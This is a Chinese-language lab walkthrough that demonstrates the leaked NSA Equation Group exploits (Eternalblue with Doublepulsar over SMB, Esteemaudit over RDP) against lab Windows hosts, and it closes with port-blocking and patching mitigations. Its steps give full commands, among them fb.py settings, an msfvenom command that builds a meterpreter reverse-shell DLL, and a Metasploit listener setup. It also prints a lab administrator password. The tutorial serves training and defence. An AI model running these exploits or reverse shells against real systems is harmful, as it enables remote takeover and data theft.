【NSA黑客工具包】Windows-0day驗證實驗

Shadow Brokers再次暴露出一份震驚世界的機密文檔,其中包含了多個Windows 遠程漏洞利用工具,可以覆蓋大量的 Windows 伺服器,一夜之間所有Windows伺服器幾乎全線暴露在危險之中,任何人都可以直接下載並遠程攻擊利用,考慮到國內不少高校、政府、國企甚至還有一些互聯網公司還在使用 Windows 伺服器,這次事件影響力堪稱網路大地震。

影響版本

全球70%的 Windows 伺服器,包括Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

危害

攻擊者通過執行腳本,使目標主機藍屏重啟,獲取Windows目標主機許可權,對目標機器進行任意操作,攻擊成本和利用條件都很低,只需在本地執行腳本,並設置相關參數。一旦攻擊成功,攻擊者能直接控制目標主機,甚至直接下載資料庫,盜取商業機密,很多的政府、事業單位都會受到影響,影響極大,危害不言而喻。

實驗工具

Metasploit:是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程序掃描,社會工程等。

Equation Group Tools:這是一個集成的工具包,裡面包含了IIS6.0、445埠、3389埠、Rootkit等遠程利用工具,本次試驗我們主要用到它的445埠遠程入侵功能,以及3389遠程埠入侵功能。

實驗目的

掌握工具的用法以及臨時防禦措施

實驗步驟

步驟1:利用Eternalblue與Doublepulsar插件,驗證445 SMB漏洞

我們本步驟利用Eternalblue和Doublepulsar這兩個"插件"來獲取Windows 7 64位的系統許可權。其中Eternalblue可以利用SMB漏洞,獲取Windows 7 系統許可權而Doublepulsar可以載入Metasploit生成的惡意DLL。

我們首先進入cmd命令行,在命令行中進入文件夾:

cd C:/EQGRP_Lost_in_Translation-master/Windows

輸入命令:

fb.py //運行python文件

註:在一般情況下需要在工具根目錄下創建listeningposts文件夾,否則運行文件時,會報錯。

接下來依次填入對應信息:

172.16.12.3 //目標IP

172.16.11.2 //本地IP

no //取消重定向

c:logs //指定日誌文件目錄

繼續填入相關新信息:

0 //創建一個新項目

Test_Win7 //項目名稱

Yes //確認路徑

到這裡就完成了最基本的信息配置,正式啟動了腳本,接下來繼續進行配置,這時就要用到第一個插件了,使用命令:

use Eternalbluet //使用Eternalblue

注意這裡要選擇操作系統、系統位數、傳輸方式,我們分別選擇Windows 7、64位、FB傳輸方式,其他配置信息直接按回車鍵,保持默認即可。

當看到Eternalblue Succeeded字樣,代表成功。

接下來需要用到Metasploit,使用Everything搜索並使用XShell連接到Kali Linux:

連接成功後,使用如下命令生成惡意DLL:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=12399 -f dll >win.dll

這時,/home目錄下就會生成win.dll文件,然後使用如下命令進入Metasploit,設置TCP監聽埠,用於接受攻擊成功後返回的Shell:

msfconsole

use exploit/multi/handler //使用監聽模塊

set payload windows/x64/meterpreter/reverse_tcp //設置payload

show options //查看配置信息

set LHOST 172.16.12.2 //設置本地IP

set LPORT 12399 //設置本地埠

run //運行

如圖,Metasploit已經成功運行,等待Shell的返回。

現在將之前生成的win.dll文件通過FTP複製到Windows機器上,首先點擊下圖中使用紅色小框標示的圖標:

本文中,我將dll文件放在C盤根目錄:

接下來使用Doublepulsar來載入生成的dll文件。

註:這裡系統位數、後門操作、後門路徑,我們分別選擇64位、RunDLL、c:/win.dll,其他保持默認即可

配置完之後,提示成功。

我們再來查看Metasploit

可以看到,成功的利用了插件,已經獲取了Shell。

步驟2:利用Esteemaudit插件,驗證3389 RDP漏洞

本步驟利用Esteemaudit插件,來驗證漏洞存在。(本步驟的目標地址為172.16.12.4)

與上一步驟一樣,首先設置基本信息,這裡就不在贅述:

基本信息配置完成之後,下面對ESTEEMAUDIT 插件進行配置:

use ESTEEMAUDIT //使用ESTEEMAUDIT插件

這裡我將CallbackPort設置為8899埠(其他埠也可以)

手動載入rudo_x86.dll和capa_x86.dll ,因為插件默認選項都在D盤,它不能識別安裝目錄,我們需要手動輸入位置,位於windowsstorage,如圖:

手動載入lipa_x86.dll,原因同上:

其他保持默認即可。

可以看到,成功執行。(同學們也可以使用3389埠對Windows Server 2003進行登錄,賬號密碼為 [administrator,ichunqiu123. ],使用命令netstat -ano 查看是否成功連接)

臨時修復方案

1、使用防火牆過濾/關閉 137、139、445埠。

2、對於 3389 遠程登錄,如果不想關閉的話,至少要關閉智能卡登錄功能。

3、升級補丁,更新系統。

實驗場景連接:【NSA黑客工具包】Windows 0day驗證實驗

推薦閱讀:

遊戲伺服器架構和web伺服器架構的區別?
瀏覽器是怎樣載入js代碼的?
51單片機能否移植uip協議搭建一個web伺服器,通過瀏覽器來訪問控制?
如何在使用 Linux 命令查找當前目錄底下的文件夾的子目錄中的某個文件?

TAG:信息安全 | 信息网络安全 | 工具箱 | Web服务器 |